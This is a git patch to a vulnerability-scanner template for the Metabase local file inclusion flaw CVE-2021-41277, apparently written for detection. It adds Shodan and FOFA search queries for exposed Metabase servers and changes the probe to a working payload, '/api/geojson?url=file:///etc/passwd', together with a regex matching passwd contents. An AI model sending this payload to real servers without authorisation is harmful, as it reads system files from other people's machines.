From a175effdc4e27c473a1575d5933fe80688b84689 Mon Sep 17 00:00:00 2001
From: sandeep <sandeep@projectdiscovery.io>
Date: Sat, 20 Nov 2021 17:19:24 +0530
Subject: [PATCH] Added few additional information

---
 .../2021/CVE-2021-41277.yaml                        | 13 +++++++++----
 1 file changed, 9 insertions(+), 4 deletions(-)
 rename CVE-2021-41277.yaml => cves/2021/CVE-2021-41277.yaml (81%)

diff --git a/CVE-2021-41277.yaml b/cves/2021/CVE-2021-41277.yaml
similarity index 81%
rename from CVE-2021-41277.yaml
rename to cves/2021/CVE-2021-41277.yaml
index 7638b2d8e1..d47d490eac 100644
--- a/CVE-2021-41277.yaml
+++ b/cves/2021/CVE-2021-41277.yaml
@@ -1,12 +1,17 @@
 id: CVE-2021-41277
+
 info:
   name: Metabase Local File Inclusion
   author: 0x_Akoko
   severity: critical
   description: Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you&#8217;re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.
   reference:
-    - https://twitter.com/90security/status/1461923313819832324
+    - https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr
     - https://nvd.nist.gov/vuln/detail/CVE-2021-41277
+    - https://twitter.com/90security/status/1461923313819832324
+  metadata:
+    shodan-query: http.title:"Metabase"
+    fofa-query: app="Metabase"
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
     cvss-score: 10.0
@@ -17,15 +22,15 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/api/geojson?url=file:/etc/passwd"
+      - "{{BaseURL}}/api/geojson?url=file:///etc/passwd"
 
     matchers-condition: and
     matchers:
 
       - type: regex
         regex:
-          - "root:[x*]:0:0"
+          - "root:.*:0:0:"
 
       - type: status
         status:
-          - 200
+          - 200
\ No newline at end of file